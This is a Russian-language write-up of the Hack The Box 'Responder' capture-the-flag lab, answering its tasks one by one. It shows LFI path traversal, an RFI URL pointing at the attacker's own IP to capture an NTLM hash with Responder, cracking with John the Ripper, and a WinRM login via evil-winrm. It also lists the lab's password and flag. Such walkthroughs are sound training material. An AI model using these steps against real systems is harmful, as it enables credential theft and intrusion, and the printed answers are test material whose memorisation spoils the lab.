Рейтинг сложности: "Очень легко"
"Responder" является частью лаборатории "Starting Point. Tier 1."
Задачи
Task №1
Вопрос: При посещении веб-сервиса, на какой домен нас перенаправляют?
Ответ: unika.htb
Task №2
Вопрос: Какой язык сценариев используется на сервере для создания веб-страниц?
Ответ: php
Task №3
Вопрос: Как называется параметр URL, который используется для загрузки различных языковых версий веб-страницы?
Ответ: page
Task №4
Вопрос: Какое из следующих значений параметра page будет примером использования уязвимости Local File Include (LFI): "french.html", "//10.10.14.6/somefile", "../../. ./../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"
Ответ: В Kali Linux добавляем в файл /etc/hosts строку ip нашей машины - unika.htb, чтобы открыть сайт.
Если в Windows, то файл hosts находится по пути C:\Windows\System32\drivers\etc\hosts. Чтобы его редактировать, нужно открыть программу-редактор от имени администратора.
Проверяем сайт в браузере
Исходя из прошлых тасков сайт на php и имеет параметр page. Попробуем прописать в url полный путь до файла hosts.
Мы получили файл hosts.
Ответом является полный путь:
../../../../../../../../windows/system32/drivers/etc/hosts
Task №5
Вопрос: Какое из следующих значений параметра page будет примером эксплуатации уязвимости Remote File Include (RFI): "french.html", "//10.10.14.6/somefile", "../../. ./../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"
Ответ: //10.10.14.6/somefile
Task №6
Вопрос: Что означает NTLM?
Ответ: New Technology LAN Manager
Task №7
Вопрос: Какой флаг используем в утилите Responder для указания сетевого интерфейса?
Ответ: -i
Task №8
Вопрос: Существует несколько инструментов, которые принимают вызов/ответ NetNTLMv2 и пробуют миллионы паролей, чтобы увидеть, дает ли какой-либо из них одинаковый ответ. Один такой инструмент часто упоминается как «John», но какое полное имя?
Ответ: John The Ripper
Task №9
Вопрос: Какой пароль для администратора?
Ответ:
Если вы используете связку Windows (как основная машина)+ Kali Linux (виртуальная машина) и подключение через OpenVPN, то для выполнения задачи подключение OpenVPN должно быть на Kali Linux.
Узнаем название сетевого интерфейса OpenVPN
sudo ip a
В Kali Linux встроена программа Responder для выполнения атаки человек-посередине в отношении методов аутентификации на Windows. Запускаем программу с нашим интерфейсом.
sudo responder -I tun0
Далее заходим в браузер и прописываем данный url, где 10.10.17.70 - адрес вашего сетевого интерфейса, его мы узнали через ip a.
unika.htb/index.php?page=//10.10.17.70/somefile
При запуске url, на программу нам приходят данные: Client, Username, Hash.
Сохраняем hash в текстовой файл. Теперь пробуем найти пароль через "John The Ripper". Запускаем программу со стандартным словарем.
Если в пути нет rockyou.txt, то скорее всего есть файл rockyou.txt.gz, который нужно разархивировать данной командой.
sudo gzip -d /usr/share/wordlists/rockyou.txt.gz
Пароль: badminton
Task №10
Вопрос: Мы воспользуемся службой Windows (т. е. работающей на коробке) для удаленного доступа к машине-ответчику с помощью восстановленного нами пароля. Какой порт TCP он прослушивает?
Ответ: Воспользуемся Nmap
Порт: 5986
Поиск флага
Попробуем подключится к серверу через программу evil-winrm. Она не установлена в Kali Linux, но есть в репозитории, так что ее можно установить через apt.
Запускаем программу с имеющимися у нас данными.
У нас откроется консоль. Погуляем по директориям и обнаружим файл flag.txt по пути "C:\Users\mike\Desktop\flag.txt
Команды консоли:
dir - узнать содержимое директории
cd - переход по директориям
type - вывести содержимое файла
Флаг:
ea81b7afddd03efaa0945333ed147fac